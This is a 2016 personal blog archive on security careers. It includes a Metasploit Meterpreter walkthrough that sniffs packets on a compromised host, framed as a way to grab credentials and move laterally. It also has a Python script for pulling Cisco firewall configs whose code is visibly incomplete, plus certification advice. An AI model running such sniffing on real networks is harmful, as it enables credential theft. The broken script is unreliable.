Monday, January 18, 2016

Packet Sniffing Metasploit with Meterpreter

Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:

Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:

###user sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### We try to see what interface we will to use to sniff the traffic

meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

###You can see the interface 2 is the network one, we will start using that interface:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)

### Stop the sniffer

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

### Download the data

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap

The I was able to open the file using wireshark raul.pcap


Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.

Friday, January 15, 2016

I want to be Ethical Hacker

A lot of people want to be ethical hacker or penetration testing, it is very rewarded job and also require a lot of effort, I will describe in this article what knowledge you need if you want to be ethical hacker. I will not touch the soft skills only the technical ones.

First this is not an easy path, it will require perseverance and a lot of self study including think completely different than any other tech (outside the box).

Basic Knowledge

Yes, you need to have basic knowledge and it has to be very solid, you do not have the luxury to have holes in your basic knowledge.

Knowledge of Windows/Linux OS, you have to be strong in one of them and very proficient in the second, I am not saying you can create a cluster with those servers, I am saying the same knowledge you should have if you are a System Admin or System Engineer working for an IT company (yes, it is very different working for one company than working for one).

Network knowledge, yes, you have to have knowledge how routing works, tcp/udp, packets, routers, switches, arp, firewalls, etc. How will you bypass a firewall if you do not know how it works or sniff traffic if you do not know switches?

Programming knowledge, you have to have one language where you are strong and if you are going to web ethical hacker you have have more that one language. A lot of hacker use perl and python.

Specialty Knowledge

This depend in what you want to be good, you cannot be strong in all the specialty with some exceptions. These are some example

Specialty Attacking  Network: For this you need to have a good knowledge of protocols, routers, switches firewalls, wifi,packets, etc.

Specialty Attacking Systems: This include a lot of the networks because you use packets, etc. Plus good knowledge in Windows/Linux and how to escalate on it to be an administrator on the server or domain.

Attacking Web Applications: In this you have to have knowledge of different web programming language like ASP, PHP, Java, etc. Also you need to have good databases knowledge, yes, How will you try to do SQL injection when you do not know anything about SQL queries?


A lot of ethical hackers have a mix of skills, They normally are strong in one specialty and a little weak in the other specialty, In the beginning do not worry what skills you will have, Begin to build your skills and later you will find what of those fields you want to be and go for, Enjoy all the process.

Tell us what do you think at

Tuesday, January 12, 2016

Pentest or hack to your new Security Analyst job

You got a phone call for a Security Analyst position in your area, you are excited, you've been applying for that kind of position, now you got their attention and have a first phone interview what will you do?

You will need to follow the same steps that a hacker does when attack a company, let's check:

Phase 1 - Reconnaissance

Yes, you will need to gather information about the company and the person or people who will do the first interview on the phone. Sure the recruiter will tell you the name (s) of them and the time. 

With the name (s) and company name you begin to research, the first thing is the company website, you need to know what the company does and what it means. Inside/out, including what position are available, the requirements, etc.

Now with the interviewer name find everything that is possible, check LinkedIn, Google+, Facebook, etc. Yes, sometime you can get in Internet where he/she lives and what kind of sport he/she plays, the better you know about that person(s) the better you will have a chance to connect.

Phase 2- Scanning

During the phone interview you have the chance to send a few packets, you have the chance to ask questions about the position, requirements, environment, ask interesting question, and those question had to be prepared before the phone interview.  Do not make uncomfortable questions, you do not want to crash your target.

Phase 3 - Gaining Access

This is the face to face interview, here you will be able to send your exploits, show then who you are, your technical and not technical skills like good communication skills. show them the ideal person for the Security Analyst position is YOU.

Remember in this phase you still are discovering, now you need to scan more and a little more, ask more questions and remember do not crash the server, you do not want denial of services DOS.

 Phase 4 - Maintaining Access

In this phase after the phone and face to face interview send an email saying what you got of the interview, showing you are interested in that position and leave the door open for more questions from them, maintain your access.

Phase 5 - Covering Tracks

If you got the position, CONGRATULATION and if not you got a lot of experience in this pentest, you will drill the next one, remember the Pentesters have to be the masters. Also in this situation, where you did not get the position send an email with a thank you for the interview, who knows they keep you in their mind and they could change their decision.

If you look your job search like a penetration testing process, then first you will enjoy it and second you will increase your confidence in yourself and success.

Keep going and enjoy the process.

Please tell me what do you think in the forum at

Script Cisco Firewall Configuration for Firewall Review PCI

Twice a year the Security Analyst needs to do firewall review for PCI or other compliance, Yes, we need to have something that can automate to grab the latest firewall configuration to analyze it. I will describe in this blog one simple script in python to grab the configuration with explanations.

I am suing in this script two modules pexpect and sys, the first one allow us to connect simulating if we are doing it from the console itself. This scrip will ask you for the firewall's IP address.

The script begin (copy from bellow):

import pexpect
import sys

asa_ip = raw_input ('Please Enter ASA IP: ')
user = "your-username-on-the-device"
password = "P@ssw0rd"
password_enable = "P@ssw0rd"

#This establish the SSH connection

child = pexpect.spawn ('ssh %s@%s' % (user,asa_ip))

#This log the result
fout = file('firewall.%s.txt' % asa_ip,'w')

#Expect the device to ask the password

#Script send the password

#Expect the '>" and type enable

#Expect asking enable password and send the password


#Send 'terminal pager 0' to avoid keep pressing Enter, if you do not do this you will have time out
child.sendline('terminal pager 0')

# Send the sh running-config command
child.sendline('sh running-config')

#Max file size

#Put it in the log file
child.logfile_read = fout

#Expect : end to finish the configuration
child.expect(': end')

print child.before


# Clean the file, removing Cisco commands

with open('firewall.%s.txt' % asa_ip,'r') as fin:
        data =
with open('firewall.%s.txt' % asa_ip,'w') as fout:

#Finish script

At the end the script will create a txt file where you will have the firewall configuration. You can use this script to backup your configuration or just to begin your firewall review.

Sunday, January 10, 2016

Where to start on Certifications?

This is a very common question on the IT forums and it is normal, just take a look in Google and you will find a lot of certifications and most of them promise the high paying jobs or to be an expert, etc. Plus a lot of us like different fields not just one, some people like System and Networks, others System and Programming, etc, etc. Yes and then we want to be very well rounded so we can fit it on a lot of jobs and we can be included in a lot of projects.

Now where to start on Certifications?

That's depend of what we want to do first or what is our goal. Let's take one example, somebody working on helpdesk, he/she wants to move on, get more hands on (some helpdesk doesn't touch the computers at all, they work on the phone, other helpdesk touch the computers or programs and do real fixes, the last one is not traditional helpdesk).

Now let's see the different paths and we will talk computer helpdesk not software support, you can adapt it:

From Helpdesk to System Admin

If the technician is been in helpdesk less than a year he/she (beginning from here I will refer he, I am implying he/she) needs to be good in that position, certifications like A+, Network or Windows 7/8/10 desktop certs will help the tech to be good in that position, at the same time he would be putting good knowledge base. Now from there he can begin to take any Windows Server certification like MCSA: Windows Server 2012 if is Windows or if is Linux Read Hat certification or CompTia Linux or LPi, etc.

You will say I need experience to pass those exams, yes you need experience to pass a lot of those exams and at the same time you need knowledge and NOBODY will give you a change to play with the servers, so what would you do? Lab a lot, yes, it is cheap, create your own virtual machines, install your own servers with roles like domain controllers, file servers, etc, how many servers and configurations you will do that's depend of you, the more you install and configure your domain controllers, dns, dhcp, open and close ports, policies, firewalls, web or email application in Windows/Linux that's depend of you, the more you do it the more you will get your own experience and confidence to pass the exams.

From Helpdesk to Network Admin

In that moment certification like Network+ will help you to put the base and the Cisco CENT or CCNA will help you to get the knowledge or any basic Juniper certifications, now the key here is the same, you need to practice a lot, yes, practice, buying the equipment is expensive but you are not alone, you have router emulation like GNS3 and the Boson router and switch emulation, you can work with that until you drill your knowledge. Some companies rent online routers/switches/firewalls like INE where you can practice.

Moving from Helpdesk to System or Network position is not easy, it will require effort, at the end you will get what you put on it, if you put a lot of effort, trying to know very well all the domains of the certification regardless of you think you will use or not in the future, one thing is clear: If your company doesn't move you to a better position or if your salary doesn't increase in that company other company will do it, they will hire you and give you the position or salary you want.

Do you want to know how to study for certification, check this article:

How to Study for Certifications?

There are a lot of reasons why to study to get certifications, here we will analyze different ways how to get it, you choose what ever is best for you. We will consider videos training, books, classes, exam simulator and labbing.

1. Class or Self Study.

Yes, some people needs to have a teacher in front of them to teach them and guide them step by step, that's normally the traditional way to do it, and that's the way we study at the school. It worked for years with a lot of modifications. If you like to have a teacher is good, it is one of the best way to learn.

Now because when we try to get certifications and the money is tight and schedule difficult some others prefer to self study, now that has some challenges, require discipline, consistency and a lot of curiosity, yes a lot of them because nobody will explain you or give you tips, you will need to deep more and more, and if you do not understand something you will need to drill and drill until you get it. If you like self study then enjoy it.

2. Method: First Videos, second books, third exam simulator and lab (if there is any).

Yes some people prefer watch all the videos first to get an idea, then read the book one or two, after the book they begin to work with exam simulation and lab. According to them it is easy to for them comprehend all the material in this way. Is this right for you?

3. Method: First books, second videos, third exam simulation and lab (is there is any).

This is similar to the second method, now some people they feel that if they drill with the book, with the real meat and then they see the videos they will emphasize or understand something that they missed reading the books, then exam simulation or lab. Is this right for you?

4. Method: First video, second NO books, third exam simulator and lab (if there is any).

Really, some people expect to pass a certification on this way and I see a lot of them trying and failing the exam, you need the meat, the real knowledge of the books, the videos will show you some parts, normally they are between 4 to 15 hours, if they need to cover in detail more, the video would take more than 40 hours. Is this right for you?

5. Method: First books, second NO videos, third exam simulator and lab (if there is any).

Some people love to read the books and they feel videos are boring, that is the hard way and effective, they really want the meat and go for it, some of them after reading the books go online to keep learning more and more, and sometimes read two or three books for the same certification. Is this right for you?

6. Method: video, books, exam simulator and lab all of them at the same time.

Yes, this is one of the best method for a lot of people, the idea is to drill one domain at the time until you understand that domain, now this require patience to keep going because some domains are a little boring or take more time than expected. Now the key for this is that sometimes between domains you need do some review of the one you already study, and you can do it using the exam simulation or flash cards to keep the first knowledge fresh. Is this right for you?

Conclusion: Remember, everybody has his/her style, we learn differently, chose the one that it is best for you and  if you feel that the method you are choose is not working you can change it on the flight. We were designed to learn all the time, enjoy it.

If you have a different method and want to share it with us please put it on the forum, I would be glad to add it to this list.

You can to

Saturday, January 9, 2016

Thanks CISSP you help me in this job

Every forum or blog where you go and they are talking about the CISSP they will mention that it is 1 mile wide and 1 inch deep. Also when you are applying to a Security Analyst position they require CISSP and the functions are not a CISSP position at all. All of this is true.

So why "Thanks CISSP, you help me in this job", guess it is because what the CISSP teach you help you to move around in that Security Analyst job, let me explain you.

Imagine that you are at your desk and you receive a ticket where you need to grant access to a user to a shared folder, the ticket just said: Allow access to \\server\data. So the ticket doesn't say what kind of access and you are not a mind reader to know what the person was thinking when submitted the ticket. So you think, the user need the right access to develop his job (probably you do not have any exact idea of the user job), so you manage "need to know" and the least privilege. You tried to contact the person who submit the ticket and it is not available. So what access you provided: Read Only until otherwise.

Five minutes later somebody call you for a physical incident and need to gab more information, then you access the DVR and begin to pull some videos with the incident time frame and in your mind you begin to think how to prevent that incident in the future.

Twenty minutes later your boss call you and mention that a company will do internal pentest to compliance with PCI.

Yes, in less that 1 hours you use your "wide" knowledge got it in your CISSP, and I am not mention other subject in the whole day. So "Thanks CISSP, you help me in this job" you will be able to move around and going deep with more experience, certifications and all the CPE you have to full fill.

Please give us your opinion at